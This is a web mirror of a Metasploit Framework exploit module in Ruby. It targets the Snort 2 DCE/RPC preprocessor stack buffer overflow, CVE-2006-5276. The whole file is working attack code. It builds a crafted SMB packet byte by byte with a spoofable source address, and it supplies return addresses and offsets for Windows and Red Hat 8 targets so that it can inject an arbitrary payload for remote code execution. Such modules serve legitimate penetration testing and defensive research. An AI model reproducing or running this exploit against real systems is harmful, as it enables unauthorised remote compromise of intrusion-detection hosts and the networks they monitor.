CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/ids/snort_dce_rpc.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Capture

10
  include Msf::Exploit::Remote::Tcp

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'            => 'Snort 2 DCE/RPC Preprocessor Buffer Overflow',

15
      'Description'     => %q{

16
          This module allows remote attackers to execute arbitrary code by exploiting the

17
        Snort service via crafted SMB traffic. The vulnerability is due to a boundary

18
        error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,

19
        which may result a stack-based buffer overflow with a specially crafted packet

20
        sent on a network that is monitored by Snort.

21


22
        Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.

23


24
        Any host on the Snort network may be used as the remote host. The remote host does not

25
        need to be running the SMB service for the exploit to be successful.

26
      },

27
      'Author'          =>

28
        [

29
          'Neel Mehta', #Original discovery (IBM X-Force)

30
          'Trirat Puttaraksa', #POC

31
          'Carsten Maartmann-Moe <carsten[at]carmaa.com>',  #Metasploit win

32
          '0a29406d9794e4f9b30b3c5d6702c708' #Metasploit linux

33
        ],

34
      'License'         => MSF_LICENSE,

35
      'References'      =>

36
        [

37
          [ 'OSVDB', '32094' ],

38
          [ 'CVE', '2006-5276' ],

39
          [ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],

40
          [ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],

41
          [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']

42
        ],

43
      'DefaultOptions'  =>

44
        {

45
          'EXITFUNC' => 'thread',

46
        },

47
      'Payload'         =>

48
        {

49
          'Space'         => 390,

50
          'BadChars'      => "\x00",

51
          'DisableNops'   => true,

52
        },

53
      'Platform'        => %w{ win linux },

54
      'Targets'         =>

55
        [

56
          [

57
            'Windows Universal',

58
            {

59
              'Platform' => 'win',

60
              'Ret'    => 0x00407c01,  # JMP ESP snort.exe

61
              'Offset' => 289,         # The number of bytes before overwrite

62
              'Padding' => 0

63
            }

64
          ],

65
          [

66
            'Redhat 8',

67
            {

68
              'Platform' => 'linux',

69
              'Ret' => 0xbffff110,

70
              'Offset' => 317,

71
              'Padding' => 28

72
            }

73
          ]

74
        ],

75
      'Privileged'      => true,

76
      'DisclosureDate'  => '2007-02-19',

77
      'DefaultTarget'   => 0))

78


79
    register_options(

80
      [

81
        Opt::RPORT(139),

82
        OptAddress.new('RHOST', [ true,  'A host on the Snort-monitored network' ]),

83
        OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])

84
      ])

85


86
    deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')

87
  end

88


89
  def exploit

90
    open_pcap

91


92
    shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)

93


94
    p = buildpacket(shost, rhost, rport.to_i)

95


96
    print_status("#{rhost}:#{rport} Sending crafted SMB packet from #{shost}...")

97


98
    return unless capture_sendto(p, rhost)

99


100
    handler

101
  end

102


103
  def buildpacket(shost, rhost, rport)

104
    p = PacketFu::TCPPacket.new

105
    p.ip_saddr = shost

106
    p.ip_daddr = rhost

107
    p.tcp_dport = rport

108
    p.tcp_flags.psh = 1

109
    p.tcp_flags.ack = 1

110


111
    # SMB packet borrowed from https://www.exploit-db.com/exploits/3362

112


113
    # NetBIOS Session Service, value is the number of bytes in the TCP segment,

114
    # must be greater than the total size of the payload. Statically set.

115
    header = "\x00\x00\xde\xad"

116


117
    # SMB Header

118
    header << "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"

119
    header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"

120
    header << "\x00\x08\x30\x00"

121


122
    # Tree Connect AndX Request

123
    header << "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"

124
    header << "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"

125
    header << "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"

126
    header << "\x3f\x3f\x3f\x3f\x3f\x00"

127


128
    # NT Create AndX Request

129
    header << "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"

130
    header << "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

131
    header << "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"

132
    header << "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"

133
    header << "\x63\x00\x00\x00"

134


135
    # Write AndX Request #1

136
    header << "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"

137
    header << "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"

138
    header << "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"

139
    header << "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"

140
    header << "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"

141
    header << "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"

142
    header << "\x2b\x10\x48\x60\x02\x00\x00\x00"

143


144
    # Write AndX Request #2

145
    header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"

146
    header << "\x00\x48\x00\x00\x00\xff\x01"

147
    tail = "\x00\x00\x00\x00\x49\x00\xee"

148


149
    # Return address

150
    eip =  [target['Ret']].pack('V')

151


152
    # Sploit

153
    sploit = make_nops(10)

154
    sploit << payload.encoded

155


156
    # Padding (to pass size check)

157
    sploit << make_nops(1)

158


159
    # The size to be included in Write AndX Request #2, including sploit payload

160
    requestsize = [(sploit.size() + target['Offset'])].pack('v')

161


162
    # Assemble the parts into one package

163
    p.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit

164


165
    p.recalc

166


167
    p

168
  end

169
end

170


171